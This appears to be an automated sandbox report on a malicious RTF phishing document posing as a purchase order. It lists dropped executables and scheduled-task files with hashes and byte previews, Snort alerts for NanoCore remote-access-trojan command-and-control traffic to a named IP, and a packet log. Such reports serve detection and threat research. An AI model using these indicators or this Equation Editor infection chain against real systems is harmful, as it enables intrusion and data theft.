Preview:	MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7I.....e..Y..Rq...3.n..u..............\|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b.....[...L..c..a..,...E5X..i.d..w.....#o+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.

C:\Users\user\AppData\Local\Temp\Tar9B57.tmp Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	data
Category:	dropped
Size (bytes):	152788
Entropy (8bit):	6.316654432555028
Encrypted:	false
SSDEEP:	1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
MD5:	64FEDADE4387A8B92C120B21EC61E394
SHA1:	15A2673209A41CCA2BC3ADE90537FE676010A962
SHA-256:	BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
SHA-512:	655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
Malicious:	false
Preview:	0..T....H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0.......`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o

C:\Users\user\AppData\Local\Temp\tmp1A35.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1319
Entropy (8bit):	5.133606110275315
Encrypted:	false
SSDEEP:	24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0mne5xtn:cbk4oL600QydbQxIYODOLedq3Ze5j
MD5:	C6F0625BF4C1CDFB699980C9243D3B22
SHA1:	43DE1FE580576935516327F17B5DA0C656C72851
SHA-256:	8DFC4E937F0B2374E3CED25FCE344B0731CF44B8854625B318D50ECE2DA8F576
SHA-512:	9EF2DBD4142AD0E1E6006929376ECB8011E7FFC801EE2101E906787D70325AD82752DF65839DE9972391FA52E1E5974EC1A5C7465A88AA56257633EBB7D70969
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Local\Temp\tmp678.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1310
Entropy (8bit):	5.1063907901076036
Encrypted:	false
SSDEEP:	24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0Rl4xtn:cbk4oL600QydbQxIYODOLedq3Sl4j
MD5:	CFAE5A3B7D8AA9653FE2512578A0D23A
SHA1:	A91A2F8DAEF114F89038925ADA6784646A0A5B12
SHA-256:	2AB741415F193A2A9134EAC48A2310899D18EFB5E61C3E81C35140A7EFEA30FA
SHA-512:	9DFD7ECA6924AE2785CE826A447B6CE6D043C552FBD3B8A804CE6722B07A74900E703DC56CD4443CAE9AB9601F21A6068E29771E48497A9AE434096A11814E84
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\catalog.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	1160
Entropy (8bit):	7.024371743172393
Encrypted:	false
SSDEEP:	24:IQnybgCUtvd7xCFhwUuQnybgCUtvd7xCFhwUuQnybgCUtvd7xCFhwUuQnybgCUtd:Ik/lCrwfk/lCrwfk/lCrwfk/lCrwfk/a
MD5:	786E4F1138F3E30FB67C690E55AC5A4F
SHA1:	828C2B627BCB54053173B54C3A4C289EF3476641
SHA-256:	D953043AE0955AA739AF97A60DAC7541048D83FC7601365A861A527E59DBFA38
SHA-512:	5FA075AB5626579DFE5A96E5B6DABF60DC3DDBA8A6E5ADEF0538032E8FB000772C7DCB73D315B208A04125F014ACCB92FAA194108D4C76443B9FB7B97719FF26
Malicious:	false
Preview:	Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.

C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	Non-ISO extended-ASCII text, with no line terminators
Category:	dropped
Size (bytes):	8
Entropy (8bit):	2.75
Encrypted:	false
SSDEEP:	3:sft:Mt
MD5:	88A7CB28E1F9D160FFED7B6A32D1C419
SHA1:	0B88822CD1B4F5A97BE75F69312FCD856571F36B
SHA-256:	153FAD0BD2B8BC7346F2C92D8A723E578A62628C92E9D3EF882BF8AA12D27E2E
SHA-512:	57258E5199BB71D7B2A85673279FA60125FB442B9C46F9C80EC68CDBF1F10DD7DB6FD240D531CADB448BEA931B54D4A884823074195E9C2F192BBB073FFF0F16
Malicious:	true
Preview:	......H

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO AAN2102002-V020.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Wed Aug 26 14:08:14 2020, atime=Wed Feb 24 14:57:31 2021, length=1297796, window=hide
Category:	dropped
Size (bytes):	2108
Entropy (8bit):	4.53782979475892
Encrypted:	false
SSDEEP:	48:81h/XT0jkwt3vr//Qh21h/XT0jkwt3vr//Q/:8j/Xojk+L/Qh2j/Xojk+L/Q/
MD5:	2D31E0A5E3CE2FB05B3249A2E7A50391
SHA1:	D65033284A86BEE643FCF6B4A910B05510958C79
SHA-256:	C1134693165539B4931F830E108B2DEFAFD1B2B22A78B9AF29B1D7520672F120
SHA-512:	18E6786A75490E4EDEB790989A2033502C140582ED0C14FC7CFCE9F5258DB8796FBF208EC883F8ADF528175F317DE5666AED6E819CED49C3E0C624A4B078F8A3
Malicious:	false
Preview:	L..................F.... .......{......{.......................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....v.2.....XR0. .POAAN2~1.DOC..Z.......Q.y.Q.y...8.....................P.O. .A.A.N.2.1.0.2.0.0.2.-.V.0.2.0...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\888683\Users.user\Desktop\PO AAN2102002-V020.doc.-.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.O. .A.A.N.2.1.0.2.0.0.2.-.V.0.2.0...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......888683..........D_....3N...W..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	92
Entropy (8bit):	4.025019499385517
Encrypted:	false
SSDEEP:	3:M1geiWY5v6ltOWY5v6lmX1geiWY5v6lv:Mivdc/Odc1vdc1
MD5:	7BDDD1418843BBC290F1CC2B2111829D
SHA1:	6AC41238F0E8FF7E578CAD5393E01A74A48294A8
SHA-256:	09050AF358201FC6E0A9C00D67108621E4F631F77903C2A16FEB35136467A9A6
SHA-512:	98656A2CBFED289E758467D8828648FA4DA8135E69C49669886B1A51A130CD37D5B1CBF6889196F25718A156C9528A427EE4C4712369A2A7700C2DEB4262D0EF
Malicious:	false
Preview:	[doc]..PO AAN2102002-V020.LNK=0..PO AAN2102002-V020.LNK=0..[doc]..PO AAN2102002-V020.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
MD5:	39EB3053A717C25AF84D576F6B2EBDD2
SHA1:	F6157079187E865C1BAADCC2014EF58440D449CA
SHA-256:	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
SHA-512:	5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YJQ5VHCG.txt Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	64
Entropy (8bit):	4.038298827786958
Encrypted:	false
SSDEEP:	3:vpqMLJUQ2R4VaUvuRRXv:vEMWXR4N23Xv
MD5:	3364137558A8998E179AC8C49945D25B
SHA1:	B7017E68567C6F7FE4A9F3C73BF79608E301A169
SHA-256:	0C7E288147364D8ED85060BB4B5C9D3DF6E53D31EC20A6A1E20F62B5CB02217D
SHA-512:	EBFA04F00C4FD683034E9423C1F736DBB9EC6E5BAC3860B9474B6C9A18D97EC53FB28304AE98322DA63B51DE9664E949D342612CF74B92C799B8A6C7D582155F
Malicious:	false
IE Cache URL:	live.com/
Preview:	wla42..live.com/.1536.3303040384.30871546.2904902535.30870214.*.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ZEL5A6R0.txt Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	ASCII text
Category:	downloaded
Size (bytes):	88
Entropy (8bit):	4.258726971363556
Encrypted:	false
SSDEEP:	3:jvl3LSUyVV2HWci2nOJgrELWhRXv:p7SHVSWci2nIgrQoXv
MD5:	6AA36785C40C2F47334E368D31E7EAF0
SHA1:	CC27C6201F13F7AE5BF0894A2FE1A6A77825B232
SHA-256:	0A256EFDCE25140BC8F809617DE87BDA6C86BC7E40F6EA113F878C1C3C4909DE
SHA-512:	C984D57DEFC775D264A2B7A3D95266CEF8920767A0AB6454D881A5A873622BBAB86B9A15A35C4325A0A1BBE85CFA32F0F08717B079BF6B41B5465C043372C086
Malicious:	false
IE Cache URL:	bit.ly/
Preview:	_bit.l1o6W3-c81e1a3d057d34d143-001.bit.ly/.1536.931204992.30906348.184848914.30870214.*.

C:\Users\user\Desktop\~$ AAN2102002-V020.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
MD5:	39EB3053A717C25AF84D576F6B2EBDD2
SHA1:	F6157079187E865C1BAADCC2014EF58440D449CA
SHA-256:	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
SHA-512:	5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

C:\Users\user\subfolder1\filename1.exe Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	4.85840802848053
Encrypted:	false
SSDEEP:	3072:FwVUPYLV4+aQTxxs+7Qx+2OGeoyrARHNlyCI2jnyIa3MAB+f/FwGIt1KFzOn1k4H:FwVUPYLV4+aQTxxs+7Qx+2OGeoyrARHs
MD5:	ACFCBD916FA04787E4388B339592DD78
SHA1:	F2A572347C81B71C3A59F00A37F68DB698715460
SHA-256:	EDE5C7B0267F4801A7BEBB22A18035923E71A476CEB3B9D94F582AA199DEB3F0
SHA-512:	23B895AD239AC48726A1446299E4534E496BB891530CB11E3764FB871F5F5097B12CCE346FDBCFE4A1C31D46F31A25CE407B17D6AB1A141BEEF9613E92DA817E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.....0...~..0......0...Rich1...........PE..L....$T.................P...................`....@.........................................................................TY..(....p.....................................................................(... ....................................text....M.......P.................. ..`.data........`.......`..............@....rsrc.......p.......p..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\69577.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	131072
Entropy (8bit):	4.85840802848053
Encrypted:	false
SSDEEP:	3072:FwVUPYLV4+aQTxxs+7Qx+2OGeoyrARHNlyCI2jnyIa3MAB+f/FwGIt1KFzOn1k4H:FwVUPYLV4+aQTxxs+7Qx+2OGeoyrARHs
MD5:	ACFCBD916FA04787E4388B339592DD78
SHA1:	F2A572347C81B71C3A59F00A37F68DB698715460
SHA-256:	EDE5C7B0267F4801A7BEBB22A18035923E71A476CEB3B9D94F582AA199DEB3F0
SHA-512:	23B895AD239AC48726A1446299E4534E496BB891530CB11E3764FB871F5F5097B12CCE346FDBCFE4A1C31D46F31A25CE407B17D6AB1A141BEEF9613E92DA817E
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.....0...~..0......0...Rich1...........PE..L....$T.................P...................`....@.........................................................................TY..(....p.....................................................................(... ....................................text....M.......P.................. ..`.data........`.......`..............@....rsrc.......p.......p..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	Rich Text Format data, unknown version
Entropy (8bit):	6.255341250007536
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	PO AAN2102002-V020.doc
File size:	1297796
MD5:	71e541e756ee25fb690431d271d26e47
SHA1:	f7f6c91b2673d889035e3d542aa47c95130d9273
SHA256:	b3104dab0a4fd156fd26e66c494970ba11bc2e954b62d7bb23a618ae7519d1b9
SHA512:	5db56f9dc9a6c2dd0daf0086a64b47750e46672e7b723b08525ead86e5d9d69d7ad3e0a55f44c79fbac1500877089509c8ca9298a0df84a6853fb1e6f68b9c0e
SSDEEP:	6144:Zy+By+By+By+By+By+By+By+By+By+By+By+By+By+By+By+By+By+By+By+By+o:ZBBBBBBBBBBBBBBBBBBBBBBBBW+Uh53
File Content Preview:	{\rtf51437\page11419927264400464@ApJnbSmEIkBYwPBr@-DysivyjzZmoIeCPiF<eh&&0_M-C_g--_-d,64>32997$Cv>yt=n5\|:%_>jn8%bm\mklP;=u\m3699.28.... .... ...... .... .... ....

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	0012A664h								no

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
02/24/21-07:59:39.832037	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49171	3765	192.168.2.22	194.5.98.182
02/24/21-07:59:46.029027	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49172	3765	192.168.2.22	194.5.98.182
02/24/21-07:59:52.264398	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49173	3765	192.168.2.22	194.5.98.182
02/24/21-07:59:58.400400	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49174	3765	192.168.2.22	194.5.98.182
02/24/21-08:00:04.540398	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49175	3765	192.168.2.22	194.5.98.182
02/24/21-08:00:10.762650	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49176	3765	192.168.2.22	194.5.98.182

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 24, 2021 07:58:03.525432110 CET	49165	80	192.168.2.22	67.199.248.10
Feb 24, 2021 07:58:03.580601931 CET	80	49165	67.199.248.10	192.168.2.22
Feb 24, 2021 07:58:03.580698967 CET	49165	80	192.168.2.22	67.199.248.10
Feb 24, 2021 07:58:03.581068039 CET	49165	80	192.168.2.22	67.199.248.10
Feb 24, 2021 07:58:03.634711027 CET	80	49165	67.199.248.10	192.168.2.22
Feb 24, 2021 07:58:03.725155115 CET	80	49165	67.199.248.10	192.168.2.22
Feb 24, 2021 07:58:03.725308895 CET	49165	80	192.168.2.22	67.199.248.10
Feb 24, 2021 07:58:03.922012091 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:03.976551056 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:03.976748943 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:03.988882065 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:04.044708014 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:04.044763088 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:04.044866085 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:04.044929981 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:04.062096119 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:04.118747950 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:04.118971109 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:05.707983017 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:05.785584927 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.175651073 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.175712109 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.175753117 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.175815105 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.175858974 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.175929070 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.175972939 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.176023960 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.176069021 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.176107883 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.176137924 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.176176071 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.176213026 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.176356077 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.176409960 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.176414967 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.176419020 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.176423073 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.176426888 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.176430941 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.176433086 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.176434994 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.176438093 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.176440001 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.176441908 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.182267904 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.228215933 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.228244066 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.228257895 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.228319883 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.228435040 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.228481054 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.228528976 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.228557110 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.228563070 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.228589058 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.228616953 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.228620052 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.228650093 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.228687048 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.228687048 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.228708982 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.228774071 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.228801012 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.228842974 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.228851080 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.228857994 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.228869915 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.228888988 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.228910923 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.228956938 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.228956938 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.228988886 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.228990078 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.229007959 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.229037046 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.229083061 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.229137897 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.229161024 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.229177952 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.229214907 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.229239941 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.229269028 CET	443	49166	5.79.72.163	192.168.2.22
